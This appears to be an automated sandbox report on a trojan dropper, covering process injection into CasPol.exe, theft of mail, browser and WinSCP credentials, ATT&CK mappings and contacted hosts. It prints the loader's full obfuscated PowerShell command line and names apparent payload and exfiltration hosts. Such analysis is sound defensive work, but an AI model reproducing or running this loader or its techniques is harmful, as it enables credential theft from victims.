Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 5EC008			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "dir;$unhappiness = """pr;pafreuekn rcfotkliseonun c cob habusreespnaserhsfusun0ri4ma ba{tr pa ep un upunacyrstalimca(an[daspitlnrbliinnregtr]es`$patraa rcwyhrtytrggreunnale gsskidrs b)su;dr aa sp un gr`$ cpneagetanrkuielldoajutbaemerdiaqul b br=cl gen sebawbe- bo cbstjcaecacblteu beb myuntkieek[ud] m ep(ta`$sot pa kcsuhinysugjeebonone psdiidissi.unlrae ln tgtitbohej s/ge sk2ca)ha;be po sk fr opfavoherub( u`$ pjudikamprcisrlaauic dk v= b0ls; e co`$exjpoi hmexcsrrina icsik w in-talhatsu un`$ st faexcleh syopgreesan refosunicrs k.rolaneutnfigemtgrhdi;od un`$uhjliispmovcsnrtsaulc skde+sk=de2tr)sp{pe me fo`$gledaksas hkanohantegjoe arshnfoehassk bl= k pr`$gatdeahyctihflypagjuetinsuetjsthi ssti.ops fucobmesdotecrsiivanfrgde( s`$ fjpaiakmelchorliabocboksp,hi sk2do)pa;ge st be fe go de su tr pa`$rupgra ttzyrlaisalgrafotshegrrchaopl e[ne`$pajprinem ccprrinargctykcl/fo2un] s in=sy f[bacreostn gvkaeporretvi]in:co:pattooflb mysitkyega(ti`$vie ukhis hkdioton mgsye granncieupsse,vi wh1ra6se) u; r ar g`$fapfoasqtprr aimaldea pt lesnrozasul v[do`$ fjboirommycapr sauncsekkd/mo2 s] u r=ta scqbyualedirtacfli umwhenerblitvtpurmoipen m8pa co`$ spflacotfirinityltoa ktoceanruraanlfu[ s`$foj piammglckrrlaafockaksa/fo2un]sy l1 o8 t2op;sk vu xa ve o}in ug[trsomtfer riudn ggdo] p[snspayquseetpue lmde. utunecox htfl. netrnafcsuouvdunidinmeg r] g:fo:baakos scali aise.krg sedotmistrtvirniifinfrgte(st`$kaptiaintnorgaikel ravrt se nr oaaklmu)ud;se}fr`$roudirgibmua cnguespl sy e1da7 p2 b0an=mib hascsthedinpaeggsphscl0li4ta ti' teba5flcpof ecud5licse2redhu3tad pbny9yn8fadre2sed iahydpoa u'bo; s`$fluaprsib baarnisebul syca1 a7no2la1 r=udb faans eepln heresinslo0 v4 n aa' hf pbsud vf ldla5 ucan4redpa9skcre5spd t9did r0dectr2un9 s8afede1eddcofpadbu8un8se5 t8un4be9up8 aeen3widha8moc v5krdep7dadfo0codar3euf d8madtl7focho2ordarf mc b0chdxe3osfnobfrdic3 bcco2ded petrdov9undty2 bcun5ki' b;ge`$hou krdibpoadynimekolcly t1 s7st2 s2kn=blb salos deornmoe rs fs i0 g4qu an'alf e1wadpa3blcmo2 fe a6muckd4kodul9 gddo5grfci7und r2bidba2lic d4codgu3ancpl5suc s5la'de;ca`$ eudirsebpra tnple rlstyud1ce7ni2ar3ap=unbbaaumsunekondvepusbusvi0au4be sm'coesa5quctafsncgi5afcmo2nydef3rad mbsu9 b8 detr4noc n3medse8focre2bedfofkadtebdud d3 s9sk8epfshfydd a8aecmu2 fdho3macpa4uddin9ufc m6heeko5 bdsu3pac c4accli0aldpofdid s5 vdst3hacsk5dd9li8pofkaeemdan7skd f8fedto2 rdtaamidlk3muehj4bedpo3 ad t0ti' d;go`$kuusiranbapakanthefelroy a1ob7ri2az4di=tub naklsnaekanopewis osst0un4 b wi'licty5 dcju2decno4hadudf tdeb8qud b1sa' u;ko`$ceusargrbtrabanmaedrlreyin1 t7am2pl5 a=fobdoaanspaerynlaefossuser0 t4sp sl'fafse1avd t3stcsk2 ffvab sd b9fydcr2ovcwo3undbiasudte3 afhee pdtv7ikdce8didvi2end sapodaf3 u'wa; g`$ tuoprrebtaa kngre dldeywa1di7op2fe6ek=cob nalisnoeconakejusfosoe0 b4je kl'skesi4nieae2reevi5ovc e6thdfo3spduf5bedblfsadbl7etdocaenffr8tad c7kedcab ldba3 i9cuasu9sm6 sfboekod kfhodsp2vod r3ref s4 ac vf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "dir;$unhappiness = """pr;pafreuekn rcfotkliseonun c cob habusreespnaserhsfusun0ri4ma ba{tr pa ep un upunacyrstalimca(an[daspitlnrbliinnregtr]es`$patraa rcwyhrtytrggreunnale gsskidrs b)su;dr aa sp un gr`$ cpneagetanrkuielldoajutbaemerdiaqul b br=cl gen sebawbe- bo cbstjcaecacblteu beb myuntkieek[ud] m ep(ta`$sot pa kcsuhinysugjeebonone psdiidissi.unlrae ln tgtitbohej s/ge sk2ca)ha;be po sk fr opfavoherub( u`$ pjudikamprcisrlaauic dk v= b0ls; e co`$exjpoi hmexcsrrina icsik w in-talhatsu un`$ st faexcleh syopgreesan refosunicrs k.rolaneutnfigemtgrhdi;od un`$uhjliispmovcsnrtsaulc skde+sk=de2tr)sp{pe me fo`$gledaksas hkanohantegjoe arshnfoehassk bl= k pr`$gatdeahyctihflypagjuetinsuetjsthi ssti.ops fucobmesdotecrsiivanfrgde( s`$ fjpaiakmelchorliabocboksp,hi sk2do)pa;ge st be fe go de su tr pa`$rupgra ttzyrlaisalgrafotshegrrchaopl e[ne`$pajprinem ccprrinargctykcl/fo2un] s in=sy f[bacreostn gvkaeporretvi]in:co:pattooflb mysitkyega(ti`$vie ukhis hkdioton mgsye granncieupsse,vi wh1ra6se) u; r ar g`$fapfoasqtprr aimaldea pt lesnrozasul v[do`$ fjboirommycapr sauncsekkd/mo2 s] u r=ta scqbyualedirtacfli umwhenerblitvtpurmoipen m8pa co`$ spflacotfirinityltoa ktoceanruraanlfu[ s`$foj piammglckrrlaafockaksa/fo2un]sy l1 o8 t2op;sk vu xa ve o}in ug[trsomtfer riudn ggdo] p[snspayquseetpue lmde. utunecox htfl. netrnafcsuouvdunidinmeg r] g:fo:baakos scali aise.krg sedotmistrtvirniifinfrgte(st`$kaptiaintnorgaikel ravrt se nr oaaklmu)ud;se}fr`$roudirgibmua cnguespl sy e1da7 p2 b0an=mib hascsthedinpaeggsphscl0li4ta ti' teba5flcpof ecud5licse2redhu3tad pbny9yn8fadre2sed iahydpoa u'bo; s`$fluaprsib baarnisebul syca1 a7no2la1 r=udb faans eepln heresinslo0 v4 n aa' hf pbsud vf ldla5 ucan4redpa9skcre5spd t9did r0dectr2un9 s8afede1eddcofpadbu8un8se5 t8un4be9up8 aeen3widha8moc v5krdep7dadfo0codar3euf d8madtl7focho2ordarf mc b0chdxe3osfnobfrdic3 bcco2ded petrdov9undty2 bcun5ki' b;ge`$hou krdibpoadynimekolcly t1 s7st2 s2kn=blb salos deornmoe rs fs i0 g4qu an'alf e1wadpa3blcmo2 fe a6muckd4kodul9 gddo5grfci7und r2bidba2lic d4codgu3ancpl5suc s5la'de;ca`$ eudirsebpra tnple rlstyud1ce7ni2ar3ap=unbbaaumsunekondvepusbusvi0au4be sm'coesa5quctafsncgi5afcmo2nydef3rad mbsu9 b8 detr4noc n3medse8focre2bedfofkadtebdud d3 s9sk8epfshfydd a8aecmu2 fdho3macpa4uddin9ufc m6heeko5 bdsu3pac c4accli0aldpofdid s5 vdst3hacsk5dd9li8pofkaeemdan7skd f8fedto2 rdtaamidlk3muehj4bedpo3 ad t0ti' d;go`$kuusiranbapakanthefelroy a1ob7ri2az4di=tub naklsnaekanopewis osst0un4 b wi'licty5 dcju2decno4hadudf tdeb8qud b1sa' u;ko`$ceusargrbtrabanmaedrlreyin1 t7am2pl5 a=fobdoaanspaerynlaefossuser0 t4sp sl'fafse1avd t3stcsk2 ffvab sd b9fydcr2ovcwo3undbiasudte3 afhee pdtv7ikdce8didvi2end sapodaf3 u'wa; g`$ tuoprrebtaa kngre dldeywa1di7op2fe6ek=cob nalisnoeconakejusfosoe0 b4je kl'skesi4nieae2reevi5ovc e6thdfo3spduf5bedblfsadbl7etdocaenffr8tad c7kedcab ldba3 i9cuasu9sm6 sfboekod kfhodsp2vod r3ref s4 ac vf			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "dir;$Unhappiness = """Pr;PaFreuEkn RcfotKliSeoNun C CoB HaBusReespnAseRhsFusun0Ri4Ma Ba{Tr Pa Ep Un UpUnaCyrStalimCa(An[DaSPitLnrBliInnRegTr]Es`$PaTraa RcWyhRtyTrgGreUnnAle GsSkiDrs B)Su;Dr Aa Sp un Gr`$ CPNeaGetAnrKuiEllDoaJutbaeMerDiaqul B Br=Cl GeN SeBawBe- BO CbStjCaecacBlteu Beb myUntKieEk[ud] M Ep(Ta`$SoT Pa KcSuhInySugJeeBonOne PsDiiDisSi.UnLRae Ln TgTitBohEj S/Ge Sk2Ca)Ha;Be Po Sk Fr OpFAvoHerUb( U`$ PJUdiKamPrcIsrLaaUic Dk V= B0Ls; E Co`$ExJPoi hmExcSrrIna IcSik W In-TalhatSu Un`$ ST FaExcLeh SyOpgReeSan ReFosUniCrs K.RoLAneUtnFigEmtGrhDi;Od Un`$uhJLiiSpmOvcSnrTsaUlc skDe+Sk=De2tr)Sp{Pe Me Fo`$GlEDakSas HkAnoHanTegJoe ArShnFoehasSk Bl= K Pr`$GaTDeaHycTihFlyPagJueTinSueTjsThi SsTi.OpS FuCobmesDotEcrSiiVanFrgDe( S`$ FJPaiAkmElcHorLiaBocBokSp,Hi Sk2Do)Pa;Ge St be Fe Go De su Tr Pa`$RuPGra TtZyrLaiSalGrafotshegrrChaopl e[Ne`$PaJPriNem CcPrrInaRgcTykCl/Fo2Un] S In=Sy F[BacReoStn GvKaePorRetVi]In:Co:PaTtooflB MySitKyeGa(Ti`$ViE UkHis HkDioTon Mgsye GrannCieupsSe,Vi Wh1Ra6Se) U; R Ar G`$FaPFoaSqtPrr aiMalDea Pt LeSnrOzaSul V[Do`$ FJboiRommycApr SaUncSekKd/Mo2 s] u r=Ta ScQbyuAleDirTacFli UmWheNerBliTvtPurMoiPen M8Pa Co`$ SPFlaCotFirIniTylToa KtoceAnrUraanlFu[ S`$FoJ PiAmmGlcKrrLaaFocKakSa/Fo2Un]Sy L1 O8 T2Op;Sk Vu Xa Ve o}In Ug[TrSOmtFer RiUdn ggDo] P[snSPayQusEetPue LmDe. UTUneCox HtFl. NETrnAfcSuoUvdUniDinMeg R] G:Fo:BaAKoS SCAlI AIse.KrG SeDotMiSTrtVirNiifinFrgTe(St`$KaPTiaIntNorGaiKel RaVrt se Nr OaAklMu)Ud;Se}Fr`$RoUDirGibMua CnGuespl Sy E1Da7 P2 B0an=MiB HaScsTheDinPaeGgsPhsCl0Li4Ta Ti' TEBa5FlCPoF ECUd5liCSe2ReDHu3TaD PBNy9Yn8FaDre2SeD IAhyDPoA u'Bo; S`$flUAprSib BaArnIseBul SyCa1 A7No2la1 r=UdB FaAns eePln HeResInsLo0 V4 N Aa' HF PBSuD VF LDLa5 UCAn4ReDPa9SkCRe5SpD T9DiD R0DeCTr2Un9 S8AfEDe1EdDCoFPaDBu8Un8Se5 T8Un4Be9Up8 AEEn3WiDha8MoC v5krDEp7DaDFo0CoDAr3EuF D8MaDtl7FoCHo2orDArF MC B0ChDXe3OsFNoBFrDIc3 BCCo2DeD pETrDOv9UnDTy2 BCun5Ki' B;Ge`$HoU KrdibPoaDynImeKolCly T1 S7St2 S2Kn=BlB saLos DeornMoe Rs Fs I0 G4Qu an'AlF E1WaDPa3BlCMo2 FE A6MuCKd4KoDUl9 GDDo5GrFCi7UnD R2BiDBa2LiC D4CoDGu3AnCPl5SuC S5La'De;Ca`$ EUDirsebPra tnPle RlStyUd1Ce7Ni2Ar3Ap=UnBBaaUmsuneKonDvePusBusVi0Au4Be Sm'CoESa5QuCTaFSnCGi5AfCMo2NyDEf3RaD MBSu9 B8 DETr4NoC N3MeDSe8FoCRe2BeDFoFKaDTeBDuD D3 S9Sk8EpFShFYdD A8AeCMu2 FDho3MaCPa4UdDIn9UfC m6HeEKo5 BDSu3PaC c4AcCLi0AlDPoFdiD S5 VDSt3HaCSk5Dd9li8PoFKaEEmDAn7SkD F8FeDTo2 RDTaAMiDLk3MuEHj4BeDPo3 AD T0ti' D;Go`$KuUSiranbApaKanTheFelroy a1Ob7Ri2Az4Di=TuB naKlsNaeKanOpeWis Osst0Un4 B Wi'LiCty5 DCJu2DeCNo4HaDUdF TDEb8QuD B1Sa' U;Ko`$CeUSarGrbTraBanMaeDrlReyin1 T7Am2Pl5 A=FoBDoaAnsPaeRynLaeFosSusEr0 T4Sp Sl'FaFSe1AvD T3StCSk2 FFVaB SD B9FyDCr2ovCWo3UnDBiASuDte3 AFHeE PDTv7IkDCe8diDVi2EnD SApoDAf3 U'Wa; G`$ TUOprRebTaa KnGre DlDeyWa1Di7Op2Fe6Ek=CoB NaLisNoeConAkeJusFosOe0 B4Je Kl'SkESi4NiEAe2ReEVi5OvC E6ThDFo3SpDUf5BeDBlFSaDbl7EtDOcAEnFFr8taD C7KeDCaB LDBa3 I9CuASu9Sm6 SFBoEKoD KFHoDSp2VoD R3ReF S4 AC VF			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Queries volume information: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Queries volume information: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\demand_rpkb_060923.exe

0_2_00403348

Stealing of Sensitive Information

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Source: Yara match

File source: 00000014.00000002.738241406.0000000020D61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	121 Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 Disable or Modify Tools	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	11 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	211 Process Injection	1 Software Packing	1 Credentials in Registry	26 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 PowerShell	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	1 Masquerading	Security Account Manager	411 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	331 Virtualization/Sandbox Evasion	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	Scheduled Transfer	2 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Access Token Manipulation	LSA Secrets	331 Virtualization/Sandbox Evasion	SSH	Keylogging	Data Transfer Size Limits	23 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	211 Process Injection	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Hidden Files and Directories	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
demand_rpkb_060923.exe	29%	ReversingLabs	Win32.Trojan.InjectorX

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://crl.md	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	142.251.2.102	true	false	high
mail.saw.si	212.44.101.105	true	false	unknown
googlehosted.l.googleusercontent.com	142.251.2.132	true	false	high
doc-0o-4k-docs.googleusercontent.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://doc-0o-4k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/2krjgeqkqvv0baf5msd218271df8njde/1694071800000/09758452479903950630/*/1n9Cf4lEBPDcOatAVm1yEaJFS19Osui94?e=download&uuid=cf2baafc-5436-4d0a-9dd6-80a6151c2ee2	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000003.00000002.446482174.0000000005D37000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_Error	demand_rpkb_060923.exe, demand_rpkb_060923.exe, 00000000.00000000.196263491.000000000040A000.00000008.00000001.01000000.00000003.sdmp, demand_rpkb_060923.exe, 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000003.00000002.438796688.0000000004E1F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000003.00000002.438796688.0000000004E1F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000003.00000002.446482174.0000000005D37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000003.00000002.446482174.0000000005D37000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000003.00000002.446482174.0000000005D37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000003.00000002.446482174.0000000005D37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	demand_rpkb_060923.exe, 00000000.00000000.196263491.000000000040A000.00000008.00000001.01000000.00000003.sdmp, demand_rpkb_060923.exe, 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000003.00000002.438796688.0000000004CD1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.md	powershell.exe, 00000003.00000002.446829144.00000000076E1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
